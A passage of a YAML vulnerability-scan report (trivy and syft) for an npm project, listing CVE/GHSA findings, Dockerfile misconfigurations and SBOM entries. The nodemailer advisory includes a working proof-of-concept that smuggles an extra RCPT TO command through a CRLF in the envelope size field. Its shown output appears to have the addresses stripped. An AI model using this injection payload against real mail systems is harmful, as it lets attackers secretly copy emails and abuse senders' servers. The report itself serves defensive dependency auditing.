InstalledVersion: 6.10.1 + FixedVersion: 8.0.4 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://github.com/advisories/GHSA-c7w3-x93f-qmm8 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:db7b269ba78fc172252ce3cd328867fff8504078f310f34689e0690febfd1a1e + Title: Nodemailer has SMTP command injection due to unsanitized `envelope.size` + parameter + Description: "### Summary\nWhen a custom `envelope` object is passed to `sendMail()`\ + \ with a `size` property containing CRLF characters (`\\r\\n`), the value is\ + \ concatenated directly into the SMTP `MAIL FROM` command without sanitization.\ + \ This allows injection of arbitrary SMTP commands, including `RCPT TO` \u2014\ + \ silently adding attacker-controlled recipients to outgoing emails.\n\n\n###\ + \ Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size`\ + \ value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\ + \n```javascript\nif (this._envelope.size && this._supportedExtensions.includes('SIZE'))\ + \ {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts\ + \ with other envelope parameters in the same function that ARE properly sanitized:\n\ + - **Addresses** (`from`, `to`): validated for `[\\r\\n<>]` at lines 1107-1127\n\ + - **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()`\ + \ at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()`\ + \ in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard\ + \ envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to',\ + \ 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key => {\n if (!standardFields.includes(key))\ + \ {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince\ + \ `_sendCommand()` writes the command string followed by `\\r\\n` to the raw\ + \ TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command\ + \ and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs\ + \ the envelope automatically from the message's `from`/`to` fields and does\ + \ not include `size`. This vulnerability requires the application to explicitly\ + \ pass a custom `envelope` object with a `size` property to `sendMail()`. \n\ + While this limits the attack surface, applications that expose envelope configuration\ + \ to users are affected.\n\n### PoC\nave the following as `poc.js` and run with\ + \ `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer\ + \ = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\n\ + const server = net.createServer(socket => {\n socket.write('220 localhost\ + \ ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk => {\n \ + \ buffer += chunk.toString();\n const lines = buffer.split('\\\ + r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n\ + \ if (!line) continue;\n console.log('C:', line);\n \ + \ if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\\ + r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL\ + \ FROM')) {\n socket.write('250 OK\\r\\n');\n } else\ + \ if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\\ + r\\n');\n } else if (line === 'DATA') {\n socket.write('354\ + \ Start\\r\\n');\n } else if (line === '.') {\n socket.write('250\ + \ OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n \ + \ socket.write('221 Bye\\r\\n');\n socket.end();\n \ + \ }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n\ + \ const port = server.address().port;\n console.log('SMTP server on port',\ + \ port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n\ + \ const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n\ + \ port,\n secure: false,\n tls: { rejectUnauthorized: false\ + \ },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n\ + \ to: 'recipient@example.com',\n subject: 'Normal email',\n \ + \ text: 'This is a normal email.',\n envelope: {\n from:\ + \ 'sender@example.com',\n to: ['recipient@example.com'],\n \ + \ size: '100\\r\\nRCPT TO:',\n },\n }, (err)\ + \ => {\n if (err) console.error('Error:', err.message);\n console.log('\\\ + nExpected output above:');\n console.log(' C: MAIL FROM:\ + \ SIZE=100');\n console.log(' C: RCPT TO: \ + \ <-- INJECTED');\n console.log(' C: RCPT TO:');\n\ + \ server.close();\n transporter.close();\n });\n});\n```\n\n\ + **Expected output:**\n```\nSMTP server on port 12345\nSending email with injected\ + \ RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM: SIZE=100\n\ + C: RCPT TO:\nC: RCPT TO:\nC: DATA\n\ + ...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:` line is injected\ + \ by the CRLF in the `size` field, silently adding an extra recipient to the\ + \ email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An\ + \ attacker who can influence the `envelope.size` property in a `sendMail()`\ + \ call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected\ + \ `RCPT TO` commands, receiving copies of all emails sent through the affected\ + \ transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional\ + \ `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage\ + \ the sending organization's SMTP server reputation** for spam or phishing delivery\n\ + \nThe severity is mitigated by the fact that the `envelope` object must be explicitly\ + \ provided by the application. Nodemailer's default envelope construction from\ + \ message headers does not include `size`. Applications that pass through user-controlled\ + \ data to the envelope options (e.g., via API parameters, admin panels, or template\ + \ configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current);\ + \ likely all versions where `envelope.size` is supported." + Severity: LOW + VendorSeverity: + ghsa: 1 + CVSS: + ghsa: + V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N + V40Score: 2.3 + References: + - https://github.com/nodemailer/nodemailer + - https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651 + - https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8 + PublishedDate: '2026-03-26T22:26:46Z' + LastModifiedDate: '2026-03-26T22:26:46Z' + context: + sbom: + name: nodemailer + version: 6.10.1 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 6.666666666666666 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 2 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a6ff7b0fa39fdb3f + ruleId: CVE-2026-41305 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of + style closing tags' + title: CVE-2026-41305 + description: PostCSS takes a CSS file and provides an API to analyze and modify + its rules by transforming the rules into an Abstract Syntax Tree. Versions prior + to 8.5.10 do not escape `` sequences when stringifying CSS ASTs. When + user-submitted CSS is parsed and re-stringified for embedding in HTML `` in CSS values breaks out of the style context, enabling XSS. + Version 8.5.10 fixes the issue. + remediation: https://avd.aquasec.com/nvd/cve-2026-41305 + references: [] + tags: + - vulnerability + - pkg:postcss@8.4.31 + risk: + cwe: &id050 + - CWE-79 + raw: + VulnerabilityID: CVE-2026-41305 + VendorIDs: + - GHSA-qx2v-qp2m-jg93 + PkgID: postcss@8.4.31 + PkgName: postcss + PkgIdentifier: + PURL: pkg:npm/postcss@8.4.31 + UID: d845910d063cee9a + InstalledVersion: 8.4.31 + FixedVersion: 8.5.10 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-41305 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:0086ad0890ab40dce9aff6b30459bf2f3c009f942faa4825d50709ee67cab3d6 + Title: 'postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of + style closing tags' + Description: PostCSS takes a CSS file and provides an API to analyze and modify + its rules by transforming the rules into an Abstract Syntax Tree. Versions prior + to 8.5.10 do not escape `` sequences when stringifying CSS ASTs. When + user-submitted CSS is parsed and re-stringified for embedding in HTML `` in CSS values breaks out of the style context, enabling XSS. + Version 8.5.10 fixes the issue. + Severity: MEDIUM + CweIDs: *id050 + VendorSeverity: + ghsa: 2 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + V3Score: 6.1 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + V3Score: 6.1 + References: + - https://access.redhat.com/security/cve/CVE-2026-41305 + - https://github.com/postcss/postcss + - https://github.com/postcss/postcss/releases/tag/8.5.10 + - https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93 + - https://nvd.nist.gov/vuln/detail/CVE-2026-41305 + - https://www.cve.org/CVERecord?id=CVE-2026-41305 + PublishedDate: '2026-04-24T03:16:11.547Z' + LastModifiedDate: '2026-04-24T17:16:21.5Z' + context: + sbom: + name: postcss + version: 8.4.31 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A03:2021 + cweTop25_2024: + - id: CWE-79 + rank: 1 + category: Injection + cisControlsV8_1: *id010 + nistCsf2_0: + - *id041 + - *id011 + - *id012 + pciDss4_0: + - *id042 + - *id013 + - *id014 + mitreAttack: + - *id043 + - *id015 + priority: + priority: 13.349866666666665 + epss: 0.00031 + epss_percentile: 0.09168 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00124 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 62517a0411bc2994 + ruleId: CVE-2026-45740 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'protobufjs: Denial of Service via unbounded recursive JSON descriptor + expansion' + title: CVE-2026-45740 + description: protobufjs compiles protobuf definitions into JavaScript (JS) functions. + Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while + expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). + A crafted JSON descriptor with deeply nested namespace definitions could cause + the JavaScript call stack to be exhausted during descriptor loading. This vulnerability + is fixed in 7.5.8 and 8.2.0. + remediation: https://avd.aquasec.com/nvd/cve-2026-45740 + references: [] + tags: + - vulnerability + - pkg:protobufjs@7.5.6 + risk: + cwe: &id051 + - CWE-674 + raw: + VulnerabilityID: CVE-2026-45740 + VendorIDs: + - GHSA-jggg-4jg4-v7c6 + PkgID: protobufjs@7.5.6 + PkgName: protobufjs + PkgIdentifier: + PURL: pkg:npm/protobufjs@7.5.6 + UID: 11481e02f6a2a6cd + InstalledVersion: 7.5.6 + FixedVersion: 7.5.8, 8.2.0 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-45740 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:0c7c535ab3a0329218c83c03c24db05aed8e9bc3de59ef7112b23085b7c52d89 + Title: 'protobufjs: Denial of Service via unbounded recursive JSON descriptor + expansion' + Description: protobufjs compiles protobuf definitions into JavaScript (JS) functions. + Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while + expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). + A crafted JSON descriptor with deeply nested namespace definitions could cause + the JavaScript call stack to be exhausted during descriptor loading. This vulnerability + is fixed in 7.5.8 and 8.2.0. + Severity: MEDIUM + CweIDs: *id051 + VendorSeverity: + ghsa: 2 + nvd: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L + V3Score: 5.3 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://github.com/protobufjs/protobuf.js + - https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jggg-4jg4-v7c6 + - https://nvd.nist.gov/vuln/detail/CVE-2026-45740 + PublishedDate: '2026-05-13T16:17:00.52Z' + LastModifiedDate: '2026-05-13T20:50:15.587Z' + context: + sbom: + name: protobufjs + version: 7.5.6 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.36426666666667 + epss: 0.00058 + epss_percentile: 0.1822 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00232 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4aee8c6d135a7c0c + ruleId: CVE-2026-45736 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: ws is an open source WebSocket client and server for Node.js. Prior to + ... + title: CVE-2026-45736 + description: ws is an open source WebSocket client and server for Node.js. Prior + to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized + memory disclosure when a TypedArray is passed as the reason argument. This vulnerability + is fixed in 8.20.1. + remediation: https://avd.aquasec.com/nvd/cve-2026-45736 + references: [] + tags: + - vulnerability + - pkg:ws@8.18.3 + risk: + cwe: &id052 + - CWE-908 + raw: + VulnerabilityID: CVE-2026-45736 + VendorIDs: + - GHSA-58qx-3vcg-4xpx + PkgID: ws@8.18.3 + PkgName: ws + PkgIdentifier: + PURL: pkg:npm/ws@8.18.3 + UID: f8dc386179443300 + InstalledVersion: 8.18.3 + FixedVersion: 8.20.1 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-45736 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:54b51dc0dfb29c3a34ed11a3c1a3c26e8c1546c9a2c83cff9b3d42b63d290b98 + Title: ws is an open source WebSocket client and server for Node.js. Prior to + ... + Description: ws is an open source WebSocket client and server for Node.js. Prior + to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized + memory disclosure when a TypedArray is passed as the reason argument. This vulnerability + is fixed in 8.20.1. + Severity: MEDIUM + CweIDs: *id052 + VendorSeverity: + ghsa: 2 + nvd: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N + V3Score: 4.4 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + V3Score: 7.5 + References: + - https://github.com/websockets/ws + - https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086 + - https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx + - https://nvd.nist.gov/vuln/detail/CVE-2026-45736 + PublishedDate: '2026-05-15T15:16:54.103Z' + LastModifiedDate: '2026-05-19T14:39:20.353Z' + context: + sbom: + name: ws + version: 8.18.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.338133333333333 + epss: 9.0e-05 + epss_percentile: 0.00961 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00036 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: eba667be954e5b93 + ruleId: Image user should not be 'root' + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: Dockerfile.dev + startLine: 0 + message: Image user should not be 'root' + title: Image user should not be 'root' + description: Running containers with 'root' user can lead to a container escape + situation. It is a best practice to run containers as non-root users, which can + be done by adding a 'USER' statement to the Dockerfile. + remediation: https://avd.aquasec.com/misconfig/ds-0002 + references: [] + tags: + - misconfig + raw: + Type: Dockerfile Security Check + ID: DS-0002 + Title: Image user should not be 'root' + Description: Running containers with 'root' user can lead to a container escape + situation. It is a best practice to run containers as non-root users, which + can be done by adding a 'USER' statement to the Dockerfile. + Message: Specify at least 1 USER command in Dockerfile with non-root user as argument + Namespace: builtin.dockerfile.DS002 + Query: data.builtin.dockerfile.DS002.deny + Resolution: Add 'USER ' line to the Dockerfile + Severity: HIGH + PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002 + References: + - https://docs.docker.com/develop/develop-images/dockerfile_best-practices/ + - https://avd.aquasec.com/misconfig/ds-0002 + Status: FAIL + CauseMetadata: + Provider: Dockerfile + Service: general + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.333333333333336 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 63eaab178df076b0 + ruleId: No HEALTHCHECK defined + severity: LOW + tool: + name: trivy + version: unknown + location: + path: Dockerfile.dev + startLine: 0 + message: No HEALTHCHECK defined + title: No HEALTHCHECK defined + description: You should add HEALTHCHECK instruction in your docker container images + to perform the health check on running containers. + remediation: https://avd.aquasec.com/misconfig/ds-0026 + references: [] + tags: + - misconfig + raw: + Type: Dockerfile Security Check + ID: DS-0026 + Title: No HEALTHCHECK defined + Description: You should add HEALTHCHECK instruction in your docker container images + to perform the health check on running containers. + Message: Add HEALTHCHECK instruction in your Dockerfile + Namespace: builtin.dockerfile.DS026 + Query: data.builtin.dockerfile.DS026.deny + Resolution: Add HEALTHCHECK instruction in Dockerfile + Severity: LOW + PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026 + References: + - https://blog.aquasec.com/docker-security-best-practices + - https://avd.aquasec.com/misconfig/ds-0026 + Status: FAIL + CauseMetadata: + Provider: Dockerfile + Service: general + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 6.666666666666666 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 2 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e68d0bbfcfdade0c + ruleId: Image user should not be 'root' + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: Dockerfile.production + startLine: 0 + message: Image user should not be 'root' + title: Image user should not be 'root' + description: Running containers with 'root' user can lead to a container escape + situation. It is a best practice to run containers as non-root users, which can + be done by adding a 'USER' statement to the Dockerfile. + remediation: https://avd.aquasec.com/misconfig/ds-0002 + references: [] + tags: + - misconfig + raw: + Type: Dockerfile Security Check + ID: DS-0002 + Title: Image user should not be 'root' + Description: Running containers with 'root' user can lead to a container escape + situation. It is a best practice to run containers as non-root users, which + can be done by adding a 'USER' statement to the Dockerfile. + Message: Specify at least 1 USER command in Dockerfile with non-root user as argument + Namespace: builtin.dockerfile.DS002 + Query: data.builtin.dockerfile.DS002.deny + Resolution: Add 'USER ' line to the Dockerfile + Severity: HIGH + PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002 + References: + - https://docs.docker.com/develop/develop-images/dockerfile_best-practices/ + - https://avd.aquasec.com/misconfig/ds-0002 + Status: FAIL + CauseMetadata: + Provider: Dockerfile + Service: general + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.333333333333336 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7b29c0ae384e49f6 + ruleId: No HEALTHCHECK defined + severity: LOW + tool: + name: trivy + version: unknown + location: + path: Dockerfile.production + startLine: 0 + message: No HEALTHCHECK defined + title: No HEALTHCHECK defined + description: You should add HEALTHCHECK instruction in your docker container images + to perform the health check on running containers. + remediation: https://avd.aquasec.com/misconfig/ds-0026 + references: [] + tags: + - misconfig + raw: + Type: Dockerfile Security Check + ID: DS-0026 + Title: No HEALTHCHECK defined + Description: You should add HEALTHCHECK instruction in your docker container images + to perform the health check on running containers. + Message: Add HEALTHCHECK instruction in your Dockerfile + Namespace: builtin.dockerfile.DS026 + Query: data.builtin.dockerfile.DS026.deny + Resolution: Add HEALTHCHECK instruction in Dockerfile + Severity: LOW + PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026 + References: + - https://blog.aquasec.com/docker-security-best-practices + - https://avd.aquasec.com/misconfig/ds-0026 + Status: FAIL + CauseMetadata: + Provider: Dockerfile + Service: general + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 6.666666666666666 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 2 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c5cf815654ece26c + ruleId: Image user should not be 'root' + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: Dockerfile.test + startLine: 0 + message: Image user should not be 'root' + title: Image user should not be 'root' + description: Running containers with 'root' user can lead to a container escape + situation. It is a best practice to run containers as non-root users, which can + be done by adding a 'USER' statement to the Dockerfile. + remediation: https://avd.aquasec.com/misconfig/ds-0002 + references: [] + tags: + - misconfig + raw: + Type: Dockerfile Security Check + ID: DS-0002 + Title: Image user should not be 'root' + Description: Running containers with 'root' user can lead to a container escape + situation. It is a best practice to run containers as non-root users, which + can be done by adding a 'USER' statement to the Dockerfile. + Message: Specify at least 1 USER command in Dockerfile with non-root user as argument + Namespace: builtin.dockerfile.DS002 + Query: data.builtin.dockerfile.DS002.deny + Resolution: Add 'USER ' line to the Dockerfile + Severity: HIGH + PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002 + References: + - https://docs.docker.com/develop/develop-images/dockerfile_best-practices/ + - https://avd.aquasec.com/misconfig/ds-0002 + Status: FAIL + CauseMetadata: + Provider: Dockerfile + Service: general + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.333333333333336 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 09a592ef82d0362e + ruleId: No HEALTHCHECK defined + severity: LOW + tool: + name: trivy + version: unknown + location: + path: Dockerfile.test + startLine: 0 + message: No HEALTHCHECK defined + title: No HEALTHCHECK defined + description: You should add HEALTHCHECK instruction in your docker container images + to perform the health check on running containers. + remediation: https://avd.aquasec.com/misconfig/ds-0026 + references: [] + tags: + - misconfig + raw: + Type: Dockerfile Security Check + ID: DS-0026 + Title: No HEALTHCHECK defined + Description: You should add HEALTHCHECK instruction in your docker container images + to perform the health check on running containers. + Message: Add HEALTHCHECK instruction in your Dockerfile + Namespace: builtin.dockerfile.DS026 + Query: data.builtin.dockerfile.DS026.deny + Resolution: Add HEALTHCHECK instruction in Dockerfile + Severity: LOW + PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026 + References: + - https://blog.aquasec.com/docker-security-best-practices + - https://avd.aquasec.com/misconfig/ds-0026 + Status: FAIL + CauseMetadata: + Provider: Dockerfile + Service: general + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 6.666666666666666 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 2 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 18edd79c677235d0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @alloc/quick-lru 5.2.0' + title: '@alloc/quick-lru 5.2.0' + description: 'Package discovered: @alloc/quick-lru 5.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 47af215a45bf2740 + name: '@alloc/quick-lru' + version: 5.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@alloc\/quick-lru:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@alloc\/quick-lru:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@alloc\/quick_lru:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@alloc\/quick_lru:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@alloc\/quick:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@alloc\/quick:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40alloc/quick-lru@5.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@alloc/quick-lru/-/quick-lru-5.2.0.tgz + integrity: sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 44b56e7441c56f19 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @babel/runtime 7.29.2' + title: '@babel/runtime 7.29.2' + description: 'Package discovered: @babel/runtime 7.29.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 77d76c145d8ae8f1 + name: '@babel/runtime' + version: 7.29.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@babel\/runtime:\@babel\/runtime:7.29.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40babel/runtime@7.29.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@babel/runtime/-/runtime-7.29.2.tgz + integrity: sha512-JiDShH45zKHWyGe4ZNVRrCjBz8Nh9TMmZG1kh4QTK8hCBTWBi8Da+i7s1fJw7/lYpM4ccepSNfqzZ/QvABBi5g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 87ac29aa779666c3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @emnapi/runtime 1.10.0' + title: '@emnapi/runtime 1.10.0' + description: 'Package discovered: @emnapi/runtime 1.10.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 90f3b7ad1f28a06b + name: '@emnapi/runtime' + version: 1.10.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@emnapi\/runtime:\@emnapi\/runtime:1.10.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40emnapi/runtime@1.10.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz + integrity: sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA== + dependencies: + tslib: ^2.4.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9dddf13ce7ce2b19 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + 